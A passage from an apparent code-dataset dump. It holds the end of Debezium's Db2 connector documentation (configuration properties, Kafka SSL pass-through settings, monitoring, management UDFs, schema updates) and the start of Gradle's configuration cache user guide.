topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. 
+\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be, or when Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default. It becomes active when the property is set to a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. 
If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. 
See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. 
Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema-history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them. 
For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. 
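Optionally, record which tables are currently in capture mode so that you can add them back after the schema update. This query is a sketch; it assumes the ASN control tables that were created in the `ASNCDC` schema during server setup, and the exact column names may vary by Db2 version:\n+\n[source,sql]\n----\nSELECT SOURCE_OWNER, SOURCE_TABLE FROM ASNCDC.IBMSNAP_REGISTER;\n----\n\n. 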
Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. 
This marks the old change-data tables as inactive, which allows the data in them to remain but they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25009870d36976a75abe5c7e48773743c6852835","subject":"Refine plugins support section","message":"Refine plugins support section\n\nSigned-off-by: Paul Merlin <a027184a55211cd23e3f3094f1fdc728df5e0500@gradle.com>\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/configuration_cache.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/configuration_cache.adoc","new_contents":"[[config_cache]]\n= Configuration cache\n\n[NOTE]\n====\nThe configuration cache is an <<feature_lifecycle.adoc#feature_lifecycle,incubating>> feature, and the details described here may change.\n====\n\n\n== Introduction\n\nThe configuration cache is a feature that significantly improves build performance by caching the result of the <<build_lifecycle#build_lifecycle,configuration phase>> and reusing this for subsequent builds.\nUsing the configuration cache, Gradle can skip the configuration phase entirely when nothing that affects the build configuration, such as build scripts, has changed.\nGradle also applies some performance improvements to task execution.\n\nThe configuration cache is conceptually similar to the <<build_cache#build_cache,build cache>>, but caches different information.\nThe build cache takes care of caching the outputs and intermediate files of the build, such as task outputs or artifact transform outputs.\nThe configuration cache takes care of caching the build configuration for a particular set of tasks.\nIn other words, the configuration cache caches the output of the configuration phase, and the build cache caches the outputs of the execution phase.\n\n[IMPORTANT]\n====\nThis feature is currently *experimental* and not enabled by default.\n====\n\n=== How does it work?\n\nWhen the configuration cache is enabled and you run Gradle for a particular set of tasks, for example by running `gradlew check`, Gradle checks whether a configuration cache entry is available for the requested set of tasks.\nIf available, Gradle uses this entry instead of running the configuration phase.\nThe cache entry contains information about the set of tasks to run, along with their configuration and dependency information.\n\nThe first time you run a particular set of tasks, there will be no entry in the configuration cache for these tasks and so Gradle will run the configuration phase as normal:\n\n1. Run init scripts.\n2. Run the settings script for the build, applying any requested settings plugins.\n3. Configure and build the `buildSrc` project, if present.\n4. Run the build scripts for the build, applying any requested project plugins.\n5. 
Calculate the task graph for the requested tasks, running any deferred configuration actions.\n\nFollowing the configuration phase, Gradle writes the state of the task graph to the configuration cache, taking a snapshot for later Gradle invocations.\nThe execution phase then runs as normal.\nThis means you will not see any build performance improvement the first time you run a particular set of tasks.\n\nWhen you subsequently run Gradle with this same set of tasks, for example by running `gradlew check` again, Gradle will load the tasks and their configuration directly from the configuration cache and skip the configuration phase entirely.\nBefore using a configuration cache entry, Gradle checks that none of the \"build inputs\", such as build scripts, for the entry have changed.\nIf a build input has changed, Gradle will not use the entry and will run the configuration phase again as above, saving the result for later reuse.\n\nBuild inputs include:\n\n- Init scripts, settings scripts, build scripts.\n- System properties, Gradle properties, and configuration files used during the configuration phase, accessed using value suppliers (TODO - add docs for this).\n- Build inputs and source files for `buildSrc` projects.\n\n=== Performance improvements\n\nApart from skipping the configuration phase, the configuration cache provides some additional performance improvements:\n\n- All tasks run in parallel by default.\n- Dependency resolution is cached.\n\n== Using the configuration cache\n\n[[enable]]\n=== Enabling the configuration cache\n\nBy default, the configuration cache is not enabled.\nIt can be enabled from the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache\n----\n\nIt can also be enabled persistently in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache=true\n----\n\nIf it is enabled in a `gradle.properties` file, it can be disabled on the command line for one build invocation:\n\n[source,bash]\n----\n$ gradle --no-configuration-cache\n----\n\n[[ignore_problems]]\n=== Ignoring problems\n\nBy default, Gradle will fail the build if any configuration cache problems are encountered.\nConfiguration cache problems can be turned into warnings on the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache-problems=warn\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache-problems=warn\n----\n\n[[max_problems]]\n=== Allowing a maximum number of problems\n\nWhen configuration cache problems are turned into warnings, Gradle fails the build if more problems than the default maximum of `512` are found.\n\nThis can be adjusted by specifying an allowed maximum number of problems on the command line:\n\n[source,bash]\n----\n$ gradle -Dorg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\n=== Invalidating the cache\n\nThe configuration cache is automatically invalidated when inputs to the configuration phase change.\nHowever, you may have to manually invalidate the configuration cache when untracked inputs to the configuration phase change.\nThis can happen if you <<configuration_cache#ignore_problems,ignored problems>> or when, for example, remote dependencies have changed.\nSee the <<configuration_cache#requirements>> and <<configuration_cache#not_yet_implemented>> sections below for more information.\n\nThe configuration cache state is stored on disk in a 
directory named `.gradle\/configuration-cache` in the root directory of the Gradle build in use.\nIf you need to invalidate the cache, simply delete that directory:\n\n[source,bash]\n----\n$ rm -rf .gradle\/configuration-cache\n----\n\nConfiguration cache entries are checked periodically (at most every 24 hours) for whether they are still in use.\nThey are deleted if they haven't been used for 7 days.\n\n[[plugin_support]]\n== Supported plugins\n\n=== Core Gradle plugins\n\nNot all <<plugin_reference#plugin_reference, core Gradle plugins>> support configuration caching yet.\n\n[cols=3*]\n|===\nh| JVM languages and frameworks\nh| Native languages\nh| Packaging and distribution\n\na|\n[horizontal]\n[.yellow]#\u26a0#:: <<java_plugin.adoc#java_plugin,Java>>\n[.yellow]#\u26a0#:: <<java_library_plugin.adoc#java_library_plugin,Java Library>>\n[.yellow]#\u26a0#:: <<java_platform_plugin.adoc#java_platform_plugin,Java Platform>>\n[.yellow]#\u26a0#:: <<groovy_plugin.adoc#groovy_plugin,Groovy>>\n[.red]#\u2716#:: <<scala_plugin.adoc#scala_plugin,Scala>>\n[.yellow]#\u26a0#:: <<antlr_plugin.adoc#antlr_plugin,ANTLR>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<cpp_application_plugin.adoc#cpp_application_plugin,C++ Application>>\n[.red]#\u2716#:: <<cpp_library_plugin.adoc#cpp_library_plugin,C++ Library>>\n[.red]#\u2716#:: <<cpp_unit_test_plugin.adoc#cpp_unit_test_plugin,C++ Unit Test>>\n[.red]#\u2716#:: <<swift_application_plugin.adoc#swift_application_plugin,Swift Application>>\n[.red]#\u2716#:: <<swift_library_plugin.adoc#swift_library_plugin,Swift Library>>\n[.red]#\u2716#:: <<xctest_plugin.adoc#xctest_plugin,XCTest>>\n\na|\n[horizontal]\n[.green]#\u2713#:: <<application_plugin.adoc#application_plugin,Application>>\n[.green]#\u2713#:: <<war_plugin.adoc#war_plugin,WAR>>\n[.green]#\u2713#:: <<ear_plugin.adoc#ear_plugin,EAR>>\n[.yellow]#\u26a0#:: <<publishing_maven.adoc#publishing_maven,Maven Publish>>\n[.red]#\u2716#:: <<publishing_ivy.adoc#publishing_ivy,Ivy Publish>>\n[.gray]#\u2716#:: <<maven_plugin.adoc#maven_plugin,Legacy Maven Plugin>>\n[.green]#\u2713#:: <<distribution_plugin.adoc#distribution_plugin,Distribution>>\n[.yellow]#\u26a0#:: <<java_library_distribution_plugin.adoc#java_library_distribution_plugin,Java Library Distribution>>\n\nh|\u00a0Code analysis\nh|\u00a0IDE integration\nh| Utility\n\na|\n[horizontal]\n[.red]#\u2716#:: <<checkstyle_plugin.adoc#checkstyle_plugin,Checkstyle>>\n[.red]#\u2716#:: <<pmd_plugin.adoc#pmd_plugin,PMD>>\n[.red]#\u2716#:: <<jacoco_plugin.adoc#jacoco_plugin,JaCoCo>>\n[.red]#\u2716#:: <<codenarc_plugin.adoc#codenarc_plugin,CodeNarc>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<eclipse_plugin.adoc#eclipse_plugin,Eclipse>>\n[.red]#\u2716#:: <<idea_plugin.adoc#idea_plugin,IntelliJ IDEA>>\n[.red]#\u2716#:: <<visual_studio_plugin.adoc#visual_studio_plugin,Visual Studio>>\n[.red]#\u2716#:: <<xcode_plugin.adoc#xcode_plugin,Xcode>>\n\na|\n[horizontal]\n[.green]#\u2713#:: <<base_plugin.adoc#base_plugin,Base>>\n[.yellow]#\u26a0#:: <<build_init_plugin.adoc#build_init_plugin,Build Init>>\n[.red]#\u2716#:: <<signing_plugin.adoc#signing_plugin,Signing>>\n[.yellow]#\u26a0#:: <<java_gradle_plugin.adoc#java_gradle_plugin,Plugin Development>>\n[.red]#\u2716#:: <<project_report_plugin.adoc#project_report_plugin,Project Report Plugin>>\n\n|===\n\n[horizontal]\n[.green]#\u2713#:: Supported plugin\n[.yellow]#\u26a0#:: Partially supported plugin\n[.red]#\u2716#:: Unsupported plugin\n[.gray]#\u2716#:: Won't fix\n\nLater Gradle releases will add support for more core 
plugins.\n\n[[troubleshooting]]\n== Troubleshooting\n\nUpon failure to serialize the state required to run the tasks, an HTML report of detected problems is generated.\nThe Gradle failure output includes a clickable link to the report.\n\n\/\/ TODO sample output from snippet\n\nThe report displays the set of problems twice.\nFirst grouped by problem message, then grouped by task.\nThe former allows you to quickly see what classes of problems your build is facing.\nThe latter allows you to quickly see which tasks are problematic.\nIn both cases you can expand the tree in order to discover where in the object graph the culprit is.\n\n[TIP]\n====\nProblems displayed in the report have links to the corresponding <<configuration_cache#requirements,requirement>> where you can find guidance on how to fix the problem or to the corresponding <<configuration_cache#not_yet_implemented,not yet implemented>> feature.\n\nWhen changing your build or plugin to fix the problems you should consider <<configuration_cache#testkit, testing your build logic with TestKit>>.\n====\n\n[[requirements]]\n== Requirements\n\nIn order to capture the state of the task graph to the configuration cache and reload it again in a later build, Gradle applies certain requirements to tasks and other build logic.\nEach of these requirements is treated as a configuration cache \"problem\" and fails the build if violations are present.\n\nThe following sections describe each of the requirements and how to change your build to fix the problems.\n\n[[disallowed_types]]\n=== Certain types must not be referenced by tasks\n\nThere are a number of types that task instances must not reference from their fields.\nUsually these types are used to carry some task input that should be explicitly declared instead.\n\nTo fix, you can often replace such a field with a `Property` or `Provider` typed field that exposes the exact information that the task will need at execution time.\n\n\/\/ TODO - examples, more details\n\n[[use_project_during_execution]]\n=== Using the `Project` object\n\nA task must not use any `Project` objects at execution time.\nThis includes calling `Task.getProject()` while the task is running.\n\nSome cases can be fixed in the same way as the previous requirement.\n\nOften, similar things are available on both `Project` and `Task`.\nFor example, if you need a `Logger` in your task actions you should use `Task.logger` instead of `Project.logger`.\n\nOtherwise, to fix, use <<custom_gradle_types#service_injection,injected services>> instead of the methods of `Project`:\n\n* `project.file(path)` -> `ProjectLayout.projectDirectory.file(path)` or `ProjectLayout.buildDirectory.file(path)`\n* `project.files(paths)` -> `ObjectFactory.fileCollection().from(paths)`\n* `project.fileTree(dir)` -> `ObjectFactory.fileTree().from(dir)`\n* `project.exec {}` -> `ExecOperations.exec {}`\n* `project.javaexec {}` -> `ExecOperations.javaexec {}`\n* `project.copy {}` -> `FileSystemOperations.copy {}`\n* `project.sync {}` -> `FileSystemOperations.sync {}`\n* `project.delete {}` -> `FileSystemOperations.delete {}`\n\n\/\/ TODO - examples, more details\n\n[[task_access]]\n=== Accessing a task instance from another instance\n\nTasks should not directly access the state of another task instance.\nInstead, tasks should be connected using inputs and outputs.\n\nTo fix, connect tasks using input and output relationships.\n`Property` and `Provider` types can be useful for this.\n\n\/\/ TODO - examples, more details\n\n[[build_listeners]]\n=== Using build 
listeners\n\nPlugins and build scripts must not register any build listeners.\n\nTo fix, use a <<build_services#build_services,build service>>.\n\n\/\/ TODO - examples, more details\n\n[[undeclared_sys_prop_read]]\n=== Undeclared reading of system properties\n\nPlugins and build scripts should not read system properties directly using the Java APIs at configuration time.\nInstead, these system properties must be declared as potential build inputs by using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getProperty(\"some-property\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getProperty(\"some-property\")\n----\n=====\n====\n\nTo fix this problem, read system properties using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.systemProperty(\"some-property\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of system properties at configuration time, to avoid invalidating configuration cache entries when the system property value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#systemProperty-java.lang.String-[providers.systemProperty()] to task properties.\n\n[[undeclared_env_var_read]]\n=== Undeclared reading of environment variables\n\nPlugins and build scripts should not read environment variables directly using the Java APIs at configuration time.\nInstead, declare environment variables as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = System.getenv(\"SOME_ENV_VAR\")\n----\n=====\n====\n\nTo fix this problem, read environment variables using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] 